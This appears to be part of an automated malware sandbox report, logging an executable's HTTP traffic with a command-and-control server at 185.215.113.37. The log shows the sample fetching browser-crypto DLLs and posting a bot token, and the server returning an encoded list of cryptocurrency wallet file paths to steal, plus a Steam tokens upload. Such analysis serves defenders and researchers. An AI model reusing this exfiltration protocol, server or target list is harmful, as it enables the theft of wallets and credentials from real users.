a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Oct 13, 2024 17:46:17.156014919 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 13, 2024 17:46:17.376262903 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:46:17 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Oct 13, 2024 17:46:17.784257889 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 13, 2024 17:46:18.005364895 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:46:17 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Oct 13, 2024 17:46:18.391153097 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 13, 2024 17:46:18.618590117 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:46:18 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Oct 13, 2024 17:46:20.335735083 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 13, 2024 17:46:20.556412935 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:46:20 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Oct 13, 2024 17:46:21.067229033 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 13, 2024 17:46:21.299129963 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:46:21 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Oct 13, 2024 17:46:21.831631899 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHI Host: 185.215.113.37 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Oct 13, 2024 17:46:22.721456051 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:46:21 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 13, 2024 17:46:23.173433065 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAK Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 2d 2d 0d 0a Data Ascii: ------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="message"wallets------DGIJEGHDAECAKECAFCAK--
Oct 13, 2024 17:46:23.403460026 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:46:23 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Oct 13, 2024 17:46:23.406883001 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGD Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 2d 2d 0d 0a Data Ascii: ------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------CGHDAKKJJJKJKECBGCGDContent-Disposition: form-data; name="message"files------CGHDAKKJJJKJKECBGCGD--
Oct 13, 2024 17:46:23.629471064 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:46:23 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 13, 2024 17:46:23.648099899 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHJJEGHIIDAFIDHJDHJE Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 4a 45 47 48 49 49 44 41 46 49 44 48 4a 44 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4a 45 47 48 49 49 44 41 46 49 44 48 4a 44 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4a 45 47 48 49 49 44 41 46 49 44 48 4a 44 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------DHJJEGHIIDAFIDHJDHJEContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------DHJJEGHIIDAFIDHJDHJEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------DHJJEGHIIDAFIDHJDHJEContent-Disposition: form-data; name="file"------DHJJEGHIIDAFIDHJDHJE--
Oct 13, 2024 17:46:24.359570026 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:46:23 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 13, 2024 17:46:24.393646955 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIJDGCAEBFIIECAKFHIJ Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 2d 2d 0d 0a Data Ascii: ------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="message"ybncbhylepme------GIJDGCAEBFIIECAKFHIJ--
Oct 13, 2024 17:46:24.630564928 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:46:24 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 4676 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 2a 2e 70 6c 3c 62 72 3e 20 31 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6f 66 66 69 63 65 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 [TRUNCATED] Data Ascii: .pl<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.office.com.microsoft.com.microsoft.com.microsoft.comsupport.microsoft.com.microsoft.com.c1.microsoft.comsupport.microsoft.com.c.bing.com.c1.microsoft.com.bing.com.microsoft.comsupport.microsoft.com.c.bing.com.c.bing.com.c1.microsoft.comlogin.microsoftonline.comsupport.microsoft.com.microsoft.comlogin.microsoftonline.com.google.com<br>.ar<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.office.com.microsoft.com.microsoft.com.microsoft.comsupport.microsoft.com.microsoft.com.c1.microsoft.comsupport.microsoft.com.c.bing.com.c1.microsoft.com.bing.com.microsoft.comsupport.microsoft.com.c.bing.com.c.bing.com.c1.microsoft.comlogin.microsoftonline.comsupport.microsoft.com.microsoft.comlogin.microsoftonline.com.google.com<br>*.br<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.offi
Oct 13, 2024 17:46:24.632601976 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAEC Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 2d 2d 0d 0a Data Ascii: ------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="message"wkkjqaiaxkhb------HJJKFBGCFHCGDHIDAAEC--
Oct 13, 2024 17:46:25.348882914 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:46:24 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=78 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	11:46:04
Start date:	13/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x970000
File size:	1'837'056 bytes
MD5 hash:	C582A9038FE13BFCF8C7F11DB6A6877A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
